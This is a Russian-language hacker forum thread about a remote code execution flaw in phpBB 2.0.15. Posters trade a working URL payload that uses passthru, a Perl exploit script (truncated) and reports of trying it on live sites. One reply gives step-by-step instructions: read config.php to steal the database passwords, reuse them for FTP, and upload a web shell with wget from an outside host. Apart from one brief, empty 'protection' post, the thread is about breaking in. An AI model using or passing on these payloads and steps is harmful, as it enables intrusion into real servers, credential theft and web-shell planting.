![]() |
Уязвимости форумов phpbb 2.0.15
Выполнение произвольного PHP сценария в phpBB в коде highlighting
Программа: phpBB 2.0.15 Опасность: Высокая Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его. |
Учись
http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).' |
ни че не происходит!
|
спасиб посмотрим
|
Если че найдешь то соообщи!
|
Незнаю, почем, но когда я выполняю его, то у меня страница грузиться намного дольше... Но на странице ничего нет, если команда "ls" выполняется невидимо, то можно было вместо "ls" поставить "rm viewtopic.php" и страница бы уже не грузилась... Но ничего не происходит!
|
ох уж мне этот пхпББ... =)
|
защита:
открыть viewtopic.php найти: Цитата:
Цитата:
|
Green_Bear
спасибо |
а еще лучшая защита - перейти на ипб или воблу. я уже. =)
|
Ребята, жизнь прекрасна или я мазахист. Но ничего не получается... Помогите...
|
хрень какая-то..
прошёлся по сайтам, и нихрена уязвимость не сработала.. |
такая же тема, но мне на данный момент это не надо.
|
ХЗ, мож она и не работае :d.
я тож на се проверял - ноль. или ошибка где. |
ошибка в том, видимо, кто осмелилися уязвимость на гл.странице выложить..
хотя это уже брали.. но блин.. это наверно с перепою запостил Кондор..))) шучу..) |
ну тогда это уже не первая ошибка.... с версией 12 или 13, не помню уже, когда выложили видео как за 5 секнуд стать админом было намного.... *цензура*
|
чето не работает!
|
вот рабочий sploit по крайней мере он работал днём!!!
|
Цитата:
|
Цитата:
|
а как файл взять то там зарегистроваться надо! дай другой линк и что за сплойт?
|
этот баг работает =)) зер гуд...
как я понял, методом тыка, кол-во повторений вызываемой команды равно кол-ву постов на странице =))) так чтоб было удобней выбирайте топик, где только одно сообщение =)) |
Блин понатуре выложите сюда, там нада регаться... =))) Пожалуйста!!!
|
по многочислеым просьбам трудящихся:
Код:
#!/usr/bin/perl |
это сплойт Раш Тимы на 2.0.10 в переделанном виде ))
щас попробоую...)) |
Как им пользоваться?
|
Цитата:
|
Здарова народ. Я тут новинький :)
Чёта я куда небюсь этим сплойтом, мне все выдает "Exploit failed" У ковонить он нормально работает? |
да, у меня.
|
И у меня, всё работает на ура!!!
|
я ввожу "phpbb.pl 192.168.140.14 / 459 "ls -la"
форум пропачен до 2.0.15 причем криво, с хакера сплоит пробивает но он какой то странный. Это тоже канает (http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).') кстати, как спомощью этого /\/\/\ грузануть файл на сервак? |
у меня тоже это сплойт работал только тогда когда он вышел в свет))) а щас все время файлед...
>>надо компилировать код пот названием r57phpbb2010.pl ?! вы что не понимаете что ПЕРЛ СКРИПТЫ не компилят?? |
дык я думаю против такой баги даже самые ленивые админы обновляют форумы.
|
&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Воспользовался вот этой темой... admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php Получил данное сообщение. Обясните ламеру что делать дальше? Как получить пароли от форума и.т.п.? |
Пожалуйста помогите)) Введите в курс дела...объясните че за сплойт)) ПОжалуйста!
|
Dragunov, максимум что ты получишь - пароли от БД. =))
их получаешь из следующей команды: viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_G ET_VARS[cmd]).' Запустил? Ничего не появилось?:)) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это: <?php $dbms = 'mysql'; $dbhost = 'localhost'; $dbname = '*********'; $dbuser = '*******'; $dbpasswd = '*****'; $table_prefix = 'phpbb_'; define('PHPBB_INSTALLED', true); ?> Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль. для заливки шелла юзаем команду wget. Синаксис: wget http://shell.narod.ru/shell.php Пишем это дело в cmd в урле. Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la. cmd=ls -la;wget http:// .... вот приблизительно так должно получиться)). Переходить в др. директории командой cd. зы: можно писать несколько команд через точку с запятой. |
Я грю)) Я конкретный ламер) ЧТо такое шелл?
|
нда...
шелл - оболочка для удалённых команд, грубо говоря..) иди на php.spb.ru/remview/ и качай remview.php . Это и есть шелл. его и будешь заливать, только сначала зарегь сайт на народе и туда залей шелл. потом будешь к нему обращаться... С тебя 5 баксов =)). |
Не качает...пишет архив битый...
|
|
| Время: 12:14 |